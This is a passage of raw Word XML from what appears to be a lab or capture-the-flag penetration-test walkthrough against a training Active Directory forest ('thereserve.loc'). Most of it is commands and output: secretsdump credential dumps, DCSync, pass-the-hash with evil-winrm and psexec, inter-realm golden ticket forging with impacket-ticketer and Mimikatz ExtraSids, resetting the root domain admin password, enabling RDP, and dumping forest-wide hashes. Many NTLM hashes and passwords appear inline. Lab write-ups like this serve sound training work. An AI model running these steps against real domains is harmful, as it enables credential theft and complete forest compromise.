          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>svcBackups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> service account password stored in plaintext.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28415C75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Dump Server1 local secrets via tunnel</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E84CF51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impacket-secretsdump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svcScanning:'Password1!'@10.200.40.31</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="781235F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DACE89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CRITICAL finding in LSA Secrets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D64F5E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[*] _SC_SYNC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453A662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svcBackups@corp.thereserve.loc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q9nzssaFtGHdqUV3Qv6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  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 PLAINTEXT!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6E9C3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6C024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Local hashes also found:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA1752D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Administrator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e2c7044e93cf7e4d8697582207d6785c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69192F70" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="4" w:color="2E75B6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">LSA Secrets often contain </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plaintext</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> service account passwords stored for scheduled tasks and services. This is how </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>svcBackups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> password was confirmed without needing to crack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063DD1B4" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CA29D17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7.2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> CORPDC — Full Domain Dump</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557145C2" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>svcBackups</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> had DS-Replication rights (found via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>PowerView</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> ACL enumeration). These rights allow performing a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>DCSync</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack to replicate all password hashes from the domain controller without needing to log into it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758E0B79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Full domain dump using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DCSync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rights</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655B25A7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impacket-secretsdump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corp.thereserve.loc/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svcBackups:'q9nzssaFtGHdqUV3Qv6G'@10.200.40.102</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="74C06BE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4F78C6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Key hashes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DCSync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77D11F9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Administrator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2efe9bd0eb716d824beb7bc6140dc718</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB66A4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krbtgt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0c757a3445acb94a654554f3ac529ede</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D171DA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t0_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heather.powell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8fb9eb207b87c2ed42f1cdfe98ba733a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD9419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t0_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josh.sutton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09910312e86ddefae7a3ee4deb6554ac</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BB556F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svcOctober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9e556d75ba03c38c410d3a171e63711f</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D6A5F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SERVER1$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9cd072e162098f35e4599d8e599fd583</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A9B300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WRK2$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79f00088cf5d2740628aff547072a127</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7044B84D" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="175F4FBF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8 — CORPDC Compromise (Pass-the-Hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E8309E9" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="441FF9F9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8.1 Access CORPDC as Domain Admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C5A67E" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>With the CORP\Administrator NTLM hash, Evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> was used to authenticate without knowing the plaintext password (Pass-the-Hash).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E90EBDE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Evil-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WinRM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Pass-the-Hash into CORPDC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B5710D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evil-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winrm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10.200.40.102 -u Administrator -H 2efe9bd0eb716d824beb7bc6140dc718</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53BECB8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993B32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access</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124D5563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</w:p>
    <w:p w14:paraId="3BD1657F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\administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2F8B41" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19FE3FD1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8.2 Alternative — </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>PsExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> Pass-the-Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E2EA80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impacket-psexec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as alternative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="214B0579" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E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impacket-psexec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-hashes :2efe9bd0eb716d824beb7bc6140dc718 administrator@10.200.40.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="561DA5AF" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A6A034A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8.3 Create Flag Verification File on CORPDC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600D0A1E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Create verification file (UUID provided by flag tool)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4A11B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[System.IO.File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]::WriteAllText(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"C:\Users\Administrator\Hollow007.txt", "&lt;UUID&gt;", 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System.Text.Encoding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ASCII)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07976EA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77BF0C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OR via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smbclient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from Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D0D76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"&lt;UUID&gt;" &gt;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/Hollow007.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE4BE2D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impacket-smbclient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-hashes :2efe9bd0eb716d824beb7bc6140dc718 CORP/Administrator@10.200.40.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78606E7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Inside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smbclient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267A5B7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use C$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F14B44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cd Users\Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18552140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/Hollow007.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E947BB" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54717C3E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9 — Inter-Realm Attack (CORP to THERESERVE)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B82FEA" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5512F23B" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>This is the most critical attack in the chain. Since CORP is a child domain of THERESERVE (same forest), we abuse the bidirectional intra-forest trust to escalate from CORP Domain Admin to THERESERVE Enterprise Admin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52E3B38C" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="046BF434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9.1 Get THERESERVE Domain SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C842969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Enumerate ROOTDC to get THERESERVE SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353575AA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impacket-lookupsid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-hashes :2efe9bd0eb716d824beb7bc6140dc718 CORP/Administrator@10.200.40.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EEFD06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1ACA7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Results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BD7442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THERESERVE SID: S-1-5-21-1255581842-1300659601-3764024703</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5D5F3C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Enterprise Admins = THERESERVE SID + -519</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651B51F1" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="64237FE3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9.2 Get THERESERVE$ Trust Account Hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EE128A" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>The inter-realm trust key (THERESERVE$ machine account hash) is needed to forge a cross-domain referral ticket.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084A0144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Extract THERESERVE$ trust account hash from CORPDC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1F4BF9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impacket-secretsdump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-hashes :2efe9bd0eb716d824beb7bc6140dc718 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB240C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CORP/Administrator@10.200.40.102 -just-dc-user "CORP/THERESERVE$"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6B403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8C8EB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Result:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4B2C63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THERESERVE$ NTLM: 4767cd467fa7bf72fb41b05b963a4cc6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34F2B732" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E6ABBD9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9.3 Configure Kerberos on Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB566FF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Edit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/krb5.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3D257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libdefaults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1DD253F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default_realm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THERESERVE.LOC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28EC047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dns_lookup_realm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false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="017546D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dns_lookup_kdc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false</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B2B839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F65124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[realms]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0379FC0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THERESERVE.LOC = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C6616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kdc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10.200.40.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A93D89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admin_server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10.200.40.100</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E805A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742C818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CORP.THERESERVE.LOC = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A71C69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kdc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10.200.40.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29DBC79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admin_server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10.200.40.102</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F851C6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609ED9B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912C33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domain_realm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6FD7828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thereserve.loc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THERESERVE.LOC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B81AD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THERESERVE.LOC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66EA65D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corp.thereserve.loc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CORP.THERESERVE.LOC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49512093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corp.thereserve.loc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CORP.THERESERVE.LOC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="485B87D6" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A76EDD0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9.4 Method A — Forge Inter-Realm Ticket with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>-ticketer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F8E32EF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Using the THERESERVE$ trust account hash and the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>ExtraSids</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> technique to forge an inter-realm ticket with Enterprise Admins SID injected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D44C3BB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Forge inter-realm Golden Ticket with Enterprise Admins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ExtraSids</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6215ACA8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-ticketer \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748D8D0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nthash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4767cd467fa7bf72fb41b05b963a4cc6 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7569651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-domain-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S-1-5-21-170228521-1485475711-3199862024 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6758323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-domain CORP.THERESERVE.LOC \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8C5D5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-extra-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S-1-5-21-1255581842-1300659601-3764024703-519 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE5FD9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spn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krbtgt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/THERESERVE.LOC \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3E770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Administrator</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D6913F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32FF56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Export ticket for use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E7126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KRB5CCNAME=/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Administrator.ccache</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="28B95E3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6066A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Connect to ROOTDC using the ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F4F0C7B" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E"/>
        <w:spacing w:after="1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evil-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winrm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ROOTDC.thereserve.loc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THERESERVE.LOC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669E8F2B" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BE73F3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9.5 Method B — Forge Golden Ticket with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>ExtraSids</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2170C53F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Alternative method using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> directly on Server1 — forge a Golden Ticket with the CORP </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> hash and inject Enterprise Admins SID into the SID history field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E4BD86D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On Server1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Mimikatz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ExtraSids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Golden Ticket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EBAC5E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.\mimikatz.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E4830E0" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="1E1E1E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privilege::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debug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5287CD0D" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000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kerberos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golden</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED2571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user:Administrator</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="266418B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domain:corp.thereserve.loc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="6915455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:S-1-5-21-170228521-1485475711-3199862024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701266D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krbtgt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:0c757a3445acb94a654554f3ac529ede</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D00E59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:S-1-5-21-1255581842-1300659601-3764024703-519</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7675437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ptt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0BAB575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741CC1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Pass the Ticket (inject directly into current session)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424060E2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injects Enterprise Admins SID into SID history</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD18A9B" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:sz="12" w:space="4" w:color="2E75B6"/>
        </w:pBdr>
        <w:shd w:val="clear" w:color="auto" w:fill="D5E8F0"/>
        <w:spacing w:before="120" w:after="120"/>
        <w:ind w:left="360" w:right="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  NOTE: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Both methods achieve the same result. Method A (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>impacket</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) runs from Kali. Method B (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Mimikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="1F3864"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>) runs from Server1 and injects the ticket into memory. Either way, the forged ticket grants Enterprise Admin access to the entire forest.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BF213F" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="266B258F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10 — ROOTDC Compromise</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778CB736" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C5D91C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lastRenderedPageBreak/>
        <w:t>10.1 Connect to ROOTDC via Kerberos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAE15D8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With ticket in memory (Method B) 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ccache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 (Method A)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D88F33C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evil-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winrm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ROOTDC.thereserve.loc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THERESERVE.LOC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E810A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6D29D1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Enterprise Admin membership</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E0984E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/groups |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findstr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"Admin"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3F96DD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THERESERVE\Enterprise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Admins  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 confirmed!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="518B94C5" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D72666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10.2 Stabilize Access — Change Password &amp; Enable RDP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42E91948" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="160"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>WinRM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> sessions </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t>timeout</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="404040"/>
        </w:rPr>
        <w:t xml:space="preserve"> frequently. RDP was enabled for a stable persistent connection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037BAD4F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 as single block to avoid timeout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB4747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user Administrator "Hollow@123!";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37E58925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ItemProperty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-Path 'HKLM:\System\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CurrentControlSet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\Control\Terminal Server'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCB30F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-Name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fDenyTSConnections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 -Value 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D21B252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NetFirewallRule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"Remote Desktop"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50C2B7C0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RDP into ROOTDC from Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591010EC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xfreerdp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u:Administrator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/p:'Hollow@123!' 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d:THERESERVE.LOC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58661536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/v:10.200.40.100 /dynamic-resolution +clipboard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F488C89" w14:textId="77777777" w:rsidR="007B11CB" w:rsidRDefault="007B11CB">
      <w:pPr>
        <w:spacing w:before="60" w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D444E64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10.3 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t>Secretsdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> ROOTDC — Full Forest Secrets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40803E60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Dump all THERESERVE domain secrets (DRSUAPI/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DCSync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method)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E5C005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proxychains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impacket-secretsdump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/Administrator:'Hollow@123!'@10.200.40.100 -just-dc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13043CD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49DA57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Key results:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE2B9E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THERESERVE\Administrator NTLM: f24bc4a9664a67b39bcae9a513d978b7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B019DD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THERESERVE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krbtgt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NTLM:        b232e0b2df4eb28a803bc21bf9a6cc87</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381033C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BANK$ machine account NTLM:    b20b54058dd0f3c90c0bb12b12bd510f</w:t>
      </w:r>
